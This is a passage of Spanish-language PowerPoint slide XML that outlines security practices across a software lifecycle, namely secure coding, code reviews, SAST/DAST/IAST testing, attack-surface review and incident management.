            <a:off x="7500370" y="4939798"/>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Revisión de las configuraciones, puertos, actualizaciones, datos de acceso o privilegios en desuso, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Imagen 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF1BED55-CEA9-B220-8913-98BDEFDCB8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2096" y="2254395"/>
            <a:ext cx="751654" cy="751654"/>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038EEC5C-11D9-B8CB-98D9-449975D6F94A}"/>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586207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92DD-BA41-CE3C-0B8C-C54F8A5920B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76C5B469-9573-1BD6-BCE3-1F2989DCD69A}"/>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206328A-EB67-1A98-17D9-A57CB8CEC67C}"/>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29DBDAB0-FCB4-862D-E2CA-0EC85F02477F}"/>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2" name="Diagrama 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{328FE13E-7776-D486-27D0-DA8121793724}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2081577358"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="546620" y="1275227"/>
          <a:ext cx="9436901" cy="1065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ángulo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA03579-2784-3B9C-A76C-16E347B7E6E2}"/>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4" name="Rectángulo 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2236D591-C19E-5285-0539-B0F46BF4A1DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158296" y="2541723"/>
            <a:ext cx="2528257" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fase de Desarrollo</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectángulo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F53854B6-F6C4-098E-7E87-B731838BD86B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706928" y="3272827"/>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Revisiones de código</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Realizar revisiones de código regulares para asegurar que el código cumple con las políticas de seguridad.</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7" name="Rectángulo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A377A59E-DD58-FB66-5FBF-4FCF7369993B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5691539" y="4900634"/>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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Revisión de código cumple con los requisitos de seguridad iniciales, SAST (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2ADA2BF-2149-C1D4-5408-FA3B445A96B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2366300" y="3272827"/>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Código seguro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Aplicar buenas prácticas de codificación segura que prevengan vulnerabilidades.</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9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{691C5C61-7C4C-E81F-BD98-E22B9B1DFAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2366300" y="4894100"/>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Validar entradas, gestión de sesiones, criptografía, gestión de errores, gestión de ficheros, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6555037D-D2F1-5103-F5D1-7A6D2BBC2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0307" y="2268166"/>
            <a:ext cx="872600" cy="872600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Imagen 10" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4ECAA856-5735-8F55-B412-51CB8EBEBF0C}"/>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240960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69044-F8A6-2E9C-82D5-54B613CBC77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7EFDC1E3-C372-ABBA-58A3-38AF7FEE8ADF}"/>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B047481-D39E-1BF8-3CE6-76B3F4912844}"/>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2B034565-6D03-2562-7A09-2FE83540C7A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E7725140-7957-0927-4A14-1BE111733343}"/>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12" name="Rectángulo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FEC2945-EA84-4E13-E4DB-4FC2F94BA797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010136" y="2514627"/>
            <a:ext cx="2078793" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fase de Pruebas</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="13" name="Diagrama 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43BF985D-977A-7A5A-2012-49F2D68F8064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3661256835"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="571392" y="1142571"/>
          <a:ext cx="9436901" cy="1065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Imagen 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07878286-01DC-3854-C71F-109BC86E49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5741" y="2207730"/>
            <a:ext cx="774395" cy="774395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectángulo 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42C33C19-CF1D-A808-F240-6A44B781AED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4395769" y="3177718"/>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Revisión de la superficie de ataque</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Identificar los vectores de ataque que podrían usarse como punto de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectángulo 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A1A70F-CF1F-CFFF-E997-9C06D4EF4A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7736397" y="3194476"/>
            <a:ext cx="3158771" cy="249366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a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Pruebas de rendimiento y estrés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Asegurar de que la aplicación es resistente a ataques de denegación de servicio y pueda manejar cargas inusuales.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1">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800">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectángulo 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D977EF10-3E2D-7DD5-3B33-0B854D8B1177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4380380" y="4962274"/>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Fuga de datos, servicios innecesarios, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectángulo 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1321F717-9B51-2C2D-1D8E-9555FD801571}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055141" y="3177718"/>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tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Pruebas dinámicas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Verificación en ejecución para comprobar su comportamiento para detectar fallos o vulnerabilidades.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1"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 </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24" name="Rectángulo 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3111AD-CAC0-376B-1B6B-74E4E0A13CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055141" y="4962274"/>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DAST (Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>), IAST (Interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Applicaction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectángulo 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24DB85BF-ECBA-5D75-4F77-3CAD76BBC70A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7736397" y="4962274"/>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Forzado de componentes hardware, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1AEF354-7C5E-F72E-732F-C00D42D56D2F}"/>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60446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64F57-B003-8C79-4BDB-1453C56FB57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98EE0F3-52C3-AB72-9FBB-FDF521551B3E}"/>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746B49F-5A61-33C2-4B79-95BA4BE9D119}"/>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4A842E89-D8E8-5646-81B6-8E5AE22351F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C7CFEFEF-5182-9B84-4DE3-87AA13A45C48}"/>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2" name="Rectángulo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E43D27-64C5-87D9-E119-962191869496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3978039" y="2481391"/>
            <a:ext cx="4325964" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Century Gothic"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Fase de Operación y Mantenimiento</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Diagrama 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF839E2-ADA2-0347-7FA3-354CC964A922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64968333"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533556" y="1256082"/>
          <a:ext cx="9436901" cy="1065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ángulo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F13B4063-79F4-E5EB-BFA8-3F35B2547050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6100819" y="3080740"/>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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Gestión de incidentes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES" sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Establecer procedimientos para responder a incidentes de seguridad.</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectángulo 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FE04B5-DF96-3AE6-87C5-09818CD71A9A}"/>
              </a:ext>
            </a:extLst>
